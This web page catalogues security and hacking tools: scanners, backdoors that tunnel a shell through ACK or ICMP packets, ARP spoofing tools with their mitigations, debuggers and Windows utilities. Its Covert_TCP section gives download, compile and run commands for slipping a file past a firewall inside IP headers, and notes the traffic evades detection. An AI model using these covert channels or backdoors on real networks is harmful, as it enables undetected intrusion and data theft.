Top Security Hacking Tools & Utilities

Top Security Hacking Tools

Penetration Testing

Tools:

  • Metasploit Project - open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development
  • Netwag – Graphical front end for netwox which contains 223 tools
  • Netcat – Computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
  • Nessus security scanner
  • OpenVASOpen Vulnerability Assessment System
  • nmap – Security Scanner For Network Exploration & Hacking

Covertly Access Remote Systems

Tools:

  • AckCmd is a backdoor client/server combination that lets you open a remote Command Prompt to another system (running the server part of AckCmd). It communicates using only TCP ACK segments. This way the client component is able to directly contact the server component through a firewall in some cases (static packet filters).
  • ICMP Shell (ISH) is a telnet-like protocol. It allows users to connect to a remote host and to open a shell using only ICMP to send and receive data. ICMP Shell was written in C for the UNIX environment.
  • Covert_TCP – Program a hacker uses to send a file through a firewall one byte at a time by hiding the data in the IP header.

To Compile: (thank you https://www.os3.nl/2009-2010/students/axel_puppe/ids/networking_log)

wget http://www-scf.usc.edu/~csci530l/downloads/covert_tcp.c cc -o covert_tcp covert_tcp.c

We did the above on 2 machines (client & server).

On the client we ran this:

sudo ./covert_tcp -dest 145.100.104.9 -source 145.100.102.136  -file file.txt

On the server we ran this:

sudo ./covert_tcp -source 145.100.102.136 -server -file test.txt

On the server we saw the data coming in:

Receiving Data: S
Receiving Data: n
Receiving Data: e
Receiving Data: @
Receiving Data: k
Receiving Data: y
Receiving Data: !

We received “Sne@ky” on the server, so this worked!

Throughput: However, the speed was atrocious at best: about 1 char (1 byte) per second.

Snort rule to detect covert_tcp covert_tcp has one big flaw, it’s really slow. Which in turn is its strong suit because this makes detecting it really hard. The footprint of the tiny bytes of data going through makes it very tricky to detect.

did not succeed to create a rule to detect covert_tcp communication, best bet if you want to stay undetected :)

ARP Exploitation – Man in the Middle Attack

Risk Analysis of ARP

  • No authentication.
  • Information leak. All hosts in the same Ethernet VLAN learn the mapping of host A. Moreover, they discover that host A wants to talk to host B.
  • Availability issue. All hosts in the same Ethernet LAN receive the ARP request (sent in a broadcast frame) and have to process it. A hostile attacker could send thousands of ARP request frames per second, and all hosts on the LAN have to process these frames. This wastes network bandwidth and CPU time.

Tools:

  • dsniff: include arpspoof http://www.monkey.org/~dugsong/dsniff/
  • ettercap: http://ettercap.sourceforge.net/
  • cain: http://www.oxid.it/
  • hunt: http://linux.die.net/man/1/hunt

Mitigating an ARP Spoofing Attack

  • Layer 3 switch – DHCP Snooping is a basis for Dynamic ARP Inspection (DAI). mapping learned from DHCP (or static address manually entered)
  • Host - Can ignore the gratuitous ARP packets.
  • Intrusion detection systems (IDS) – Can keep states about all mappings and detect whether someone tries to change an existing mapping.
    • Cisco IDS
    • ARPWatch (a free tool) – ftp://ftp.ee.lbl.gov/arpwatch.tar.gz

Debugging

Immunity Debugger

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.

bullet Top Security Hacking Tools & UtilitiesA debugger with functionality designed specifically for the security industry
bullet Top Security Hacking Tools & UtilitiesCuts exploit development time by 50%
bullet Top Security Hacking Tools & UtilitiesSimple, understandable interfaces
bullet Top Security Hacking Tools & UtilitiesRobust and powerful scripting language for automating intelligent debugging
bullet Top Security Hacking Tools & UtilitiesLightweight and fast debugging to prevent corruption during complex analysis
bullet Top Security Hacking Tools & UtilitiesConnectivity to fuzzers and exploit development tools

The Best of Both Worlds
Immunity Debugger’s interfaces include the GUI and a command line. The command line is always available at the bottom of the GUI. It allows the user to type shortcuts as if they were in a typical text-based debugger, such as WinDBG or GDB. Immunity has implemented aliases to ensure that your WinDBG users do not have to be retrained and will get the full productivity boost that comes from the best debugger interface on the market.

Get Immunity Debugger here

Troubleshooting Utilities – Windows

Download NirLauncher Package

Package Contents

Current Package Version: 1.10.06
Filename: nirsoft_package_1.10.06.zip
MD5 Hash: d45236d47d6200b4cf8e68e576114ee4
SHA1 Hash: fea68683d6b620a3c6d940e36bd575af1aac4ec7
File Size: 8530769 Bytes
Updated On: November 07 2010 07:07:33

download1 Top Security Hacking Tools & Utilities

Notice: Don’t use any aggressive download manager that opens multiple connections. If you do so, your IP address might be blocked from downloading this package.

Additional Downloads

sysinternals2.nlp This package file allows you to easily add SysInternals Suite into NirLauncher. In order to use this file, follow the instructions below:

  1. Download SysInternals Suite from Sysinternals Suite Web page, and extract all files into a new subfolder under the main folder of NirLauncher.
  2. Right click on the sysinternals2.nlp link, choose ‘Save Link As’ or ‘Save Target As’, and put it in the same folder that you extracted the SysInternals files.
  3. Drag sysinternals2.nlp into the window of NirLauncher or use the ‘Add Software Package’ in the Launcher menu.
  4. If you do it right, the SysInternals should be loaded into NirLauncher. You can switch between the NirSoft package and SysInternals package by using F3/F4 keys.

nirlauncher sysinternals screenshot Top Security Hacking Tools & Utilities

joeware.nlp This package file allows you to easily add joeware free tools into NirLauncher.
You can download Joeware tools from joeware free tools Web page, drop all the tools that you need into one folder, and then add joeware.nlp into this folder. After that, simply drag joeware.nlp from Explorer into the main window of NirLauncher.

Windows – MISC

Tools:

  • IP scan Angry IP scanner is a very fast IP scanner and port scanner. It can scan IP addresses in any range as well as any their ports. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc
  • Getmac provides a quick method for obtaining the MAC (Ethernet) layer address and binding order for a computer running Windows 2000, locally or across a network
  • IM Sniffer Intercepts and decodes all instant message traffic (currently AOL Instant Messenger, AIM Express, ICQ, MSN and Yahoo) sent/received by the local computer or another computer on the network
  • CurrPorts v1.83 displays the list of all currently opened TCP/IP and UDP ports on your local computer. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process
  • mRemote mRemote allows you to manage all your remote connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols